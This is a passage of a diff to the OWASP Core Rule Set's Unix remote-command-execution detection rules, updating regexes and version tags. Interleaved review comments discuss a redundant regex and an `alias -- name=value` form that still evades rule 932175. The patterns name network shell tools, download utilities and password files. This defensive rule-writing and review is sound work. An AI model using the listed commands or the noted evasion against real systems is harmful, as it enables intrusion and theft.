>\|]|g(?:passwd|rp)|pass|sh)|lang\+\+|o(?:mm[\s\x0b&\)<>\|]|proc)|(?:ron|scli)[\s\x0b&\)<>\|])|d(?:iff[\s\x0b&\)<>\|]|mesg|oas)|e(?:2fsck|grep)|f(?:grep|iletest|tp(?:stats|who))|g(?:r(?:ep[\s\x0b&\)<>\|]|oupmod)|unzip|z(?:cat|exe|ip))|htop|l(?:ast(?:comm|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:get)?|osetup|s(?:-F|b_release|cpu|mod|of|pci|usb)|wp-download|z(?:4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:ilq|ster\.passwd)|k(?:fifo|nod|temp)|locate|ysql(?:admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:\.(?:openbsd|traditional)|at)|et(?:(?:c|st)at|kit-ftp|plan)|ohup|ping|stat)|onintr|p(?:dksh|er(?:f[\s\x0b&\)<>\|]|l[\s\x0b&\)5<>\|])|(?:ft|gre)p|hp(?:-cgi|[57])|igz|k(?:exec|ill)|(?:op|se)d|rint(?:env|f[\s\x0b&\)<>\|])|tar(?:diff|grep)?|wd\.db|y(?:thon[23]|3?versions))|r(?:(?:bas|ealpat)h|m(?:dir[\s\x0b&\)<>\|]|user)|nano|sync)|s(?:diff|e(?:ndmail|t(?:env|sid))|ftp|(?:h\.distri|pwd\.d)b|ocat|td(?:err|in|out)|udo|ysctl)|t(?:ailf|c(?:p(?:ing|traceroute)|sh)|elnet|imeout[\s\x0b&\)<>\|]|raceroute6?)|u(?:n(?:ame|lz(?:4|ma)|(?:pig|x)z|rar|zstd)|ser(?:(?:ad|mo)d|del))|vi(?:gr|pw|sudo)|w(?:get|hoami)|x(?:args|z(?:c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more))|z(?:c(?:at|mp)|diff|[ef]?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|std(?:(?:ca|m)t|grep|less)?))" \ "id:932260,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Remote Command Execution: Direct Unix Command Execution',\ - logdata:'Matched Data: %{TX.0} found within %{TX.932260_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-unix',\ 
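Review bot: The rewritten 932260 pattern still carries the dead alternation `\$(?:.*|.*)` inside the assignment-prefix group `[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|...)`; both branches are identical, so the second can never match anything the first did not, and it only doubles the work a backtracking engine does when the enclosing `(?:...)*` loop retries. The same construct appears in the other patterns this commit touches (932250, 932231 and the PL2 pipe rule), which suggests the redundancy originates in the upstream regex-assembly source rather than in this copy, so the fix belongs there; the local change would simply be `\$.*` in place of `\$(?:.*|.*)`. Since this file looks like vendored CRS output that is regenerated on each sync, a hand patch here would presumably be lost at the next update.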
@@ -166,9 +166,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
- setvar:'tx.932260_matched_var_name=%{matched_var_name}',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx !-\d" \
@@ -187,7 +186,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -207,7 +206,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -227,7 +226,7 @@ SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+{" \
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -247,11 +246,11 @@ SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \ba[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s\b[\s\x0b]+[!\"%',0-9@-Z_a-z]+=[^\s\x0b]" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \ba[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s\b[\s\x0b]+(?:[\+\-][a-z]+\+?[\s\x0b]+)?[!\"%',-\.0-9@-Z_a-z]+=[^\s\x0b]" \ "id:932175,\ phase:2,\ block,\ @@ -267,7 +266,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
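Review bot: The new optional option group `(?:[\+\-][a-z]+\+?[\s\x0b]+)?` in the 932175 alias pattern accepts a single short option such as `-p ` before the `name=value` pair, but not the bare `--` option terminator, so `alias -- ls='...'` still slips past the rule even though the name class was widened to include `-` in the same change: the `--` token is consumed by `[!\"%',-\.0-9@-Z_a-z]+` and the match then fails on the following space instead of `=`. If the targeted shells accept `--` at that position, as bash's builtin option parsing normally does, the group should admit it as well, e.g. `(?:(?:[\+\-][a-z]+\+?|--)[\s\x0b]+)?`, and a `-p -- name=value` form would additionally need `*` in place of the trailing `?` since the group currently allows at most one option. Because this file appears to be a vendored copy of the generated CRS output, the change belongs in the upstream regex-assembly source for 932175 rather than in this copy.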
@@ -287,7 +286,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -307,7 +306,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -327,13 +326,13 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\
)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*\.[\s\x0b].*\b" \ +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" 
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\|
|&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*\.[\s\x0b].*\b" \ "id:932231,\ phase:2,\ block,\ @@ -349,11 +348,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx \$(?:\((?:.*|\(.*\))\)|\{.*\})|[<>]\(.*\)|/[0-9A-Z_a-z]*\[!?.+\]" \ +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx \$(?:\((?:.*|\(.*\))\)|\{.*\}|\[.*\])|[<>]\(.*\)|/[0-9A-Z_a-z]*\[!?.+\]" \ "id:932131,\ phase:1,\ block,\ 
@@ -369,7 +368,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx \$(?:\((?:.*|\(.
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -389,7 +388,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.932200_matched_var_name=%{matched_var_name}',\
 chain"
@@ -416,7 +415,7 @@ SecRule REQUEST_HEADERS:Referer "@rx ^[^#]+" \
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.932205_matched_var_name=%{matched_var_name}',\
 chain"
@@ -447,7 +446,7 @@ SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]*?(?:['\*\?\x5c`][^\n/]+/|/[^/]+?['\*
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.932206_matched_var_name=%{matched_var_name}',\
 chain"
@@ -458,7 +457,7 @@ SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]*?(?:['\*\?\x5c`][^\n/]+/|/[^/]+?['\* "t:none,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\x0b]*|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o
